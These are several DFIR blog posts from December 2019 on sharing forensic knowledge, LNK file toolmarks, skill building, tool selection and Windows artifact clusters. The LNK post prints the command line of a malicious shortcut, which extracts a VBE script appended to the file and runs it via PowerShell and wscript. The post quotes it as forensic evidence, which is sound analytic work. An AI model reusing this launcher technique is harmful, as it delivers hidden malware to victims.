Tuesday, December 31, 2019

Maintaining The KnowledgeBase

As 2019 closes, we move into not just a new year, but also a new decade.  While, for the most part, this isn't entirely significant...after all, how different will you really be when you wake up on 2 Jan...times such as this offer an opportunity for reflection and for addressing those things what we may decide we need to change.

I blogged recently regarding Brett's thoughts on how to do about improving #DFIR skills, and to some extend, expanding on them from my own perspective.  Then this morning, I was perusing one of the social media sites that I frequent, and came across a question regarding forensic analysis of "significant locations" on an iPhone 6. I really have no experience with smart phones or iOS, but I thought it would be interesting to take a quick look, so I did a Google search.  The first result was an article that had been posted on the same social media site a year and a half ago.

I recently engaged with another analyst via social media, regarding recovering Registry hives from unallocated space.  The analyst had specifically asked about FOSS tools, and in relatively short order, I found an 8 pg PDF document on the subject, written by Andrew Case.  The document wasn't dated, but it did refer specifically to Windows XP, so that gave me some idea of the time frame as to when Andrew "put pen to paper", as it were.  Interestingly, Andrew's paper made use of one of the FOSS tools the analyst asked about, so it worked out pretty well.

The industry is populated by the full spectrum of #DFIR folks, from those interested in the topic and enthusiasts, to folks for whom digital analysis work is part of their job but not an everyday thing, all the way through academics and highly dedicated professionals.  There are those who don't "do" DFIR analysis all the time, and those whose primary role is to do nothing but digital analysis and research.

And there's always something new to learn, isn't there?  There's always a question that needs to be answered, such as, "how do I recover an NTUSER.DAT hive from a deleted user profile?"  I would go so far as to say that we all have questions such as these from time to time, and that some of us have the time to research these questions, and others don't.  Some of us find applicable results pretty quickly, and some of us can spend a great deal of time searching for an answer, never finding anything that applies to what we're trying to accomplish.  I know that's happened to me more times than I care to count.

The good news is that, in most cases, the information someone is seeking is out there.  Someone knows it, and someone may have even written it down.  The bad news is...the information is out there.  If you don't have enough experience in the field or topic in question, you're likely going to have difficulty finding what you're looking for.  I get it.  For every time I run a Google search and the first half a dozen responses hit the nail squarely on the head, there are 5 or 6 searches where I've just not found anything of use...not because it doesn't exist but more likely due to my search terms. 

Training can be expensive, and can require the attendee to be out of the office or off the bench for an extended period of time.  And training my very often not cover those things for which we have questions.  For example, throughout the past two decades, I've not only spoken publicly multiple times on the topic of Registry analysis, as well as written and conducted training courses (and even written books on the topic), but it never occurred to me that someone would want to recover the NTUSER.DAT hive from a deleted profile.  And, even though I've asked multiple times over the years for feedback, even posing the question, "...what would you like to see covered/addressed?", not once has the topic of recovering deleted hives come up.

That is, until recently.  Now, we have a need for "just in time training".  The good news is that we have multiple resources available to us...Google, the Forensics Wiki, and Brett's DFIR Training site, to name a few.  The down side is that even searching these sites in particular, you may not find what you're looking for.

So, for the coming year...nay, the coming decade...my request or "call to action" is for folks in the community to take more active steps in a couple of areas.  First, develop purposeful, intentional relationships in the community.  Go beyond following someone on social media, or clicking "Like" or "RT" to everything you see.  Instead, connect with someone because you have a purposeful intention for doing so, and because you're aware of the value that you bring to the relationship.  What this leads to is developing relationships based on trust, and subsequently, the sharing of tribal knowledge.

Second, actively take steps to maintain the knowledgebase.  If you're looking for something, try the established repositories.  If you can't find it there, but you do find an answer, and even if you end up building the answer yourself from bits and pieces, take active steps to ensure that what you found doesn't pass undocumented.  I'll be the first to tell you that I haven't seen everything there is to see...I've never done a BEC investigation.  There are a lot of ransomware infections I've never seen, nor investigated.  My point is that we don't all see everything, but by sharing what we've experienced, we can ensure that more of us can benefit from each other's experiences.  Jim Mattis, former Marine Corps warfighter and general officer, and former Secretary of Defense, stated in his recent book that our "own personal experiences are not broad enough to sustain [us]."  This is 1000% true for warfighters, as well as for threat hunters, and forensic and intel analysts. 

So, for the coming of the new year, resolve to take a more active role not just in learning new things, but adding to the knowledgebase of the community.

Sunday, December 29, 2019

LNK Toolmarks

Matt posted a blog article a while back, and I took interest in large part because it involved an LNK file.  Matt provided a hash for the file in question, as well as a walk-through of his "peeling of the onion", as it were.  However, one of the things that Matt pointed out that still needed to be done was toolmark analysis.

In his article, Matt says that LNK file, "...stitch together the world between the attacker and the victim."  He's right.  When an actor sends an LNK file to a target, particularly as an email attachment, they are sharing evidence of their development environment, which can be used to track threat actors and their campaigns.  This is facilitated by the fact that LNK files not only contain a great deal of metadata from the actor's dev environment that act as "toolmarks", but also due to the fact that the absence of portions of that metadata can also be considered "toolmarks", as well.

The metadata extracted from the LNK file Matt discussed is illustrated below:

File: d:\cases\lnk\foto
guid               {00021401-0000-0000-c000-000000000046}
mtime              Sat Sep 15 07:28:38 2018 Z
atime              Thu Sep 26 22:40:14 2019 Z
ctime              Sat Sep 15 07:28:38 2018 Z
workingdir         %CD%                          
basepath           C:\Windows\System32\cmd.exe   
shitemidlist       My Computer/C:\/Windows/System32/cmd.exe
**Shell Items Details (times in UTC)**
  C:2018-09-15 06:09:28  M:2019-09-23 17:18:10  A:2019-09-26 22:31:52 Windows  (9)  [526/1]
  C:2018-09-15 06:09:28  M:2019-05-06 20:04:58  A:2019-09-26 22:02:08 System32  (9)  [2246/1]
  C:2018-09-15 07:28:40  M:2018-09-15 07:28:40  A:2019-09-26 22:38:36 cmd.exe  (9)  
vol_sn             D4DA-5010                     
vol_type           Fixed Disk                    
commandline        /c start "" explorer "%cd%\Foto" | powershell -NonInteractive -noLogo -c "& {get-content %cd%\Foto.lnk | select -Last 1 > %appdata%\_.vbe}" && start "" wscript //B "%appdata%\_.vbe"
iconfilename       C:\Windows\System32\shell32.dll
hotkey             0x0                             
showcmd            0x7                             

***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasWorkingDir|HasExpIcon|HasLinkInfo|HasArguments|HasIconLocation|HasRelativePath

As you can see, we have a good bit of what we'd expect to see in an LNK file, but there are also elements clearly absent, items we'd expect to see that just aren't there.  For example, there are no Extra Data Blocks (confirmed by visual inspection), and as such, no MAC address, no machine ID (or NetBIOS name), etc.  These missing pieces can be viewed as toolmarks, and we've seen where code executed by an LNK file has been appended to the end of the LNK file itself. 

While this particular LNK file is missing a good bit of what we would expect to see, based on the file format, there is still a good bit of information available that can be used to develop a better intel picture.  For example, the volume serial number is intact, and that can be used in a VirusTotal retro-hunt to locate other, perhaps similar LNK files.  This would then give some insight into how often this particular technique (and dev system) seem to be in use and in play, and if the VirusTotal page for each file found contains some information about the campaign, on which it was seen, that might also be helplful.

What something like this illustrates is the need for tying DFIR work much closer to CTI, and even EDR/MSS.  Some organizations still have these functions as separate business units, and this is particularly true within consulting organizations.  In such instances, CTI resources do not have the benefit of accessing DFIR information (and to some extent, vice versa), minimizing the view into incidents and campaigns.  Having the ability to fully exploit DFIR data, such as LNK files, and incorporating that information into CTI reporting produces a much richer picture, as evidenced by this FireEye write-up regarding Cozy Bear.

Saturday, December 28, 2019

Improving DFIR Skills

There are more than a few skills that make up the #DFIR "field", and just one of them is conducting DFIR analysis.  Brett Shavers recently shared his thoughts on how to improve in this area, specifically by studying someone else's case work.  In his article, Brett lists a number of different avenues for reviewing work conducted by others a means of improving your own skills.

Brett and I are both Marine veterans, and Marines have a long history of looking to the experience of others to expand, extend, and improve our own capabilities.  In the case of war fighting, a great deal has been written, providing a wealth of information to dig into and study.  Jim Mattis stated in his book, "Call Sign Chaos", that "...your personal experiences alone are not broad enough to sustain you."  This is true not only for a Marine general, but also for a DFIR analyst.  In fact, I would say even more so for an analyst.

Okay, so how do we apply this?  One way is to follow Brett's advice, and seek out resources.  There are numerous web sites available, and another resource is David Cowen's book, Computer Forensics InfoSec Pro Guide.

Another available resource is Investigating Windows Systems.  What makes this book different from others that you might find is that when writing it, my goal was to demonstrate stitching together the analysis process, by explaining why certain decisions were made, and the data and thought processes led to various findings.  Rather than simply presenting a finding, I wanted to illustrate the data that was laid out before me when I made each of the analysis decisions.  As with all of my other books, I wrote IWS in large part due to the fact that I couldn't find any book (or other resource) that took this approach.

Another approach is participating in CTFs.  However, if you don't feel confident in participating in the actual CTF itself, but still want to take a shot at the analysis and see how others went about answering the challenge questions, there are often options available.  In 2018, DefCon had a forensic analysis CTF, and a bit after the conference, several (I found 3) folks posted their take on the challenges.

My "thing" with CTFs is that they very often aren't 'real world'.  For example, in all of my time as an incident responder, I've never had someone ask me to identify a disk signature or volume serial number from an acquired image.  Can I?  Sure.  But it's never been part of the analysis process, in providing services to a customer.  As such, I posted something of my own take on a few of the questions (here, and here), so they're available for anyone to read, and because the images are available, anyone can walk through what I or the other folks did, following along using their own tools and their own analysis processes.

If you do decide to engage in developing your skills, one of the best ways to do so is when you have someone to help you get over the humps.  I'll admit it...sometimes, I take time to research something and may come up with a solution that isn't at all elegant, and could perhaps be done better.  Or maybe, due to the fact that I'm relying on my own experiences, I don't see or consider something that to someone else, is obvious.  Having a mentor, someone you can go to with questions and bounce ideas off of can be very beneficial in both the long and short term.

Wednesday, December 25, 2019

What is "best"?

A lot of times I'll see a question in DFIR-related social media, along the lines of, "what is the best tool to do X?"  I've seen this a couple of times recently, perhaps the most recent being, "what is the best carving tool?"  Nothing was started with respect to what was being carved (files, records, etc.), what the operating or file system in question was, etc. Just, "what is the best tool?"

I was recently searching online for a tire inflator.  I live on a farm, and have a couple of tractors, a truck, and a horse trailer.  I don't need a fully-functional air compressor, but I do need something portable and manageable for inflating tires, something both my wife and I can use not only around the farm, but also when we're on the road.  As I began looking around at product reviews, I also started seeing those "best of" lists, where someone (marketing firm, editorial board, etc.) compiled a list of what they determined to be the "best" available of a particular product.

Understand that I have a pretty good idea of what I'm looking for, particularly with respect to features.  I'm looking for something that can plug into the cigarette lighter in the truck or car, or to another power source, such as "house power" or a portable generator.  I'm looking for something that can fill a tire to at least 100 psi (some tires go to 12 psi, others 90 psi), but I'm not super-concerned about the speed; my primary focus is ease of use, and durability.  Being able to set the desired pressure and have it auto-stop would be very useful, but it's not a show-stopper.

Some of the inflators listed as "best" had to be connected directly to the vehicle battery.  Yeah, I know...right?  Not particularly convenient if my wife needs to add pressure to a tire, particularly when plugging into the cigarette lighter is much more convenient.  I mean, really...how "convenient" is it to pull over to the side of the road, and have someone who hasn't used jumper cables to jump-start another vehicle connect an inflator to battery terminals?  Some inflators not listed as "best" were considered to be "too expensive" (although no threshold for cost was provided as a basis for testing), and looking a bit more closely, those inflators allowed the user to connect to different power sources.  Okay, so that sort of makes sense, but rather than say that the product is "too expensive", maybe list why.  Another was described as "too heavy", although it weighed just 5 lbs (as opposed to the "best", which came in at just over 3 lbs).

Bringing this back to #DFIR, I ran across this article the other day, which reportedly provides a list of the "top 10 digital forensics consulting/services companies".  A list of the companies is provided on the page, with a brief description of what each company does, but what really stood out for me is that the list is compiled by "a distinguished panel of prominent marketing specialists".  This, of course, begs the question as to the criteria used to determine which companies were reviewed, and of those, which made the top 10.

In 2012, I attended a conference presentation where the speaker made comments about various tools, including RegRipper.  One comment was, "RegRipper doesn't detect...", and that wasn't necessarily true.  RegRipper was released in 2008 with the intention of being a community-driven tool.  However, only a few have stepped up over the years to write and contribute plugins.  RegRipper is capable of detecting a great deal (null bytes in key/value names, RLO char, etc.), and if your installation of RegRipper "doesn't detect" something, it's likely that (a) you haven't written the plugin, or (b) you haven't asked someone for help writing the plugin.

During that same presentation, the statement was made that "RegRipper does not scale to the enterprise".  This is true.  It is also true that it was never designed to do so.  The use case for which RegRipper was written is still in active use today.

My point is simply this..."best" is relative.  If you're asking the question (i.e., "..what is the best #DFIR tool to do X?"), then understand that, if you don't share your requirements, what you're going to get back is what's best for the respondent, if anything.  No one wants to write an encyclopedia of all of the different approaches, and available tools.  Although, I'm sure someone will be happy to link you to one.  ;-) 

When you're considering the best "tool", take a look at the process, and maybe consider the best approach. Sometimes it's not about the tool.  Also, consider the what it is you're trying to accomplish (your goals), as well as other considerations, such as operating or file system, etc.  If you're not comfortable with the command line, or would perhaps like to consider a GUI solution (because doing so makes for a good screen capture in a report), or if you require the use of a commercial (vs FOSS...some do) tool, be sure to take those details into consideration, and if you're asking a question online, share them, as well.




Tuesday, December 03, 2019

Artifact Clusters

Very often within the DFIR community, we see information shared (usually via blog posts) regarding a "new" artifact that has been recently unearthed, or simply being addressed for the first time.  In some cases, the artifact is new to us, and in others, it may be the result of some new feature added to the Windows operating system or to an application.  Sometimes when we see this new artifact discussed, a tool is shared to parse and make sense of the data afforded by that artifact.  In some cases, we may find that multiple tools are available for parsing the same artifact, which is great, because it shows interest and diversity in the approach to accessing and making use of the data.

However, what we don't often see is how that artifact relates to other artifacts from the same system.  Another way to look at it is, we don't often see how the tool, or more importantly, the data available in the source, can serve us to further an investigation. We may be left thinking, "Great, there's this data source, and a tool that allows me to extract and make some sense of the data within it, but how do I use it as part of an investigation?"


I shared an initial example of what this might look like recently in a recent blog post, and this was also the approach I took when I wrote about the investigations in Investigating Windows Systems. I hadn't seen any books available that covered the topic of digital forensic analysis (as opposed to just parsing data) from an investigation-wide perspective, completing an investigation using multiple artifacts to "tell the story".  The idea was (and still is) that a single artifact, or a single entry derived from a data source, does NOT tell the whole story of the investigation.  A single artifact may be a high fidelity indicator that provides a starting point for an investigation, but it does not tell the whole story. Rather than a single artifact, analysts should be looking at artifact clusters to provide the necessary context for an analyst to make a finding as to what happened.

Artifact clusters provide two things to the investigator; validation and context.  Artifact clusters provide validation by reinforcing that an event occurred, or that the user took some action.  That validation may be a duplicate event; in my previous blog post, we see the following events in our timeline:

Wed Nov 20 20:09:28 2019 Z
  TIMELINE                   - Start Time:Program Files x86\Microsoft Office\Office14\WINWORD.EXE 
  REG                        - [Program Execution] UserAssist - {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Microsoft Office\Office14\WINWORD.EXE (5)

What we see here (above) are duplicate events that provide validation.  We see via the UserAssist data that the user launched WinWord.exe, and we also see validation from the user's Activity Timeline database.  Not only do we have validation, but we can also see what the artifact cluster should look like, and as such, have an understanding of what to look for in the face of anti-forensics efforts, be they intentional or the result of natural evidence decay.

In other instances, validation may come in the form of supporting events.  For example, again from my previous blog post, we see the following two events side-by-side in the timeline:

Wed Nov 20 22:50:02 2019 Z
  REG                        - RegEdit LastKey value -> Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\TaskFlow
  TIMELINE                   - End Time:Windows\regedit.exe 

In this example, we see that the user closed the Registry Editor, and that the user's LastKey value was set, illustrating the key that was in focus when the Registry Editor was closed.  Rather than being duplicate events, these two events support each other.

Looking at different event sources during the same time period also helps us see the context of the events, as we get a better view of the overall artifact cluster.  For example, consider the above timeline entries that pertain to the Registry Editor.  With just the data from the Registry, we can see when the Registry Editor was closed, and the key that was in focus when it was closed.  But that's about all we know. 

However, if we add some more of the events from the overall artifact cluster, we can see not just when, but how the Registry Editor was opened, as illustrated below:

Wed Nov 20 22:49:11 2019 Z
  TIMELINE                   - Start Time:Windows\regedit.exe 

Wed Nov 20 22:49:07 2019 Z
  REG                        - [Program Execution] UserAssist - {F38BF404-1D43-42F2-9305-67DE0B28FC23}\regedit.exe (1)
  REG                        - [Program Execution] UserAssist - {0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Administrative Tools\Registry Editor.lnk (1)

From a more complete artifact cluster, we can see that the user had the Registry Editor open for approximately 51 seconds.  Information such as this can provide a great deal of context to an investigation.

Evidence Oxidation
Artifact clusters give us a view into the data in the face of anti-forensics, either as dedicated, intentional, targeted efforts to remove artifacts, or as natural evidence decay or oxidation.

Wait...what?  "Evidence oxidation"?  What is that?  I shared some DFIR thoughts on Twitter not long ago on this topic, and in short, what this refers to is the natural disappearance of items from artifact clusters due to the passage of time, as some of those artifacts are removed or overwritten as the system continues to function. This is markedly different from the purposeful removal of artifacts, such as Registry keys being specifically and intentionally modified or deleted.

This idea of "evidence decay" or "evidence oxidation" begins with the Order of Volatility, which lists different artifacts based on their "lifetime"; that is to say that different artifacts age out or expire at different rates.  For example, a process executed in memory will complete (often with seconds, or sooner) and the memory used by that process will be freed for use by another process in fairly short order.  That process may result in the operating system or application generating an entry into a log file, which itself may roll over or be overwritten at various rates (i.e., the entry itself is overwritten as newer entries are added), depending upon the logging mechanism.  Or, a file may be created within the file system that exists until someone...a person...purposefully deletes it.  Even then, the contents of the file may exist (NTFS resident file, etc.) for a time after the file is marked as "not in use", something that may be dependent upon the file system in use, the level of activity on the system, whether a backup mechanism (backup, Volume Shadow Copy, etc.) occurred between the file creation and deletion times, etc.

In short, some artifacts may have the life span of a snowflake, or a fruit fly, or a tortoise.  The life span of an artifact can depend upon a great deal; the operating system (and version) employed, the file system structure, the auditing infrastructure, the volume of usage of the system, etc.  Consider this...I was once looking at a USN Change Journal from an image acquired from a Windows 7 system, and the time span of the available data was maybe a day and a half.  Right around that time, a friend of mine contacted me about a Windows 2003 system he was examining, for which the USN Change Journal contained 90 days worth of data.

Windows systems can be very active, even when they appear to be sitting idle with no one actively typing at the keyboard.  The operating system itself may reach out for updates, during which files are downloaded, processes are executed, and files are deleted.  The same is true for a number of applications. Once a user becomes active on the system, the volume of activity and changes may increase dramatically.  I use several applications (Notepad++, UltraEdit, VirtualBox, etc.) that all reach out to the Internet to look for updates when they're launched.  Just surfing the web causes browser history to be generated and cached.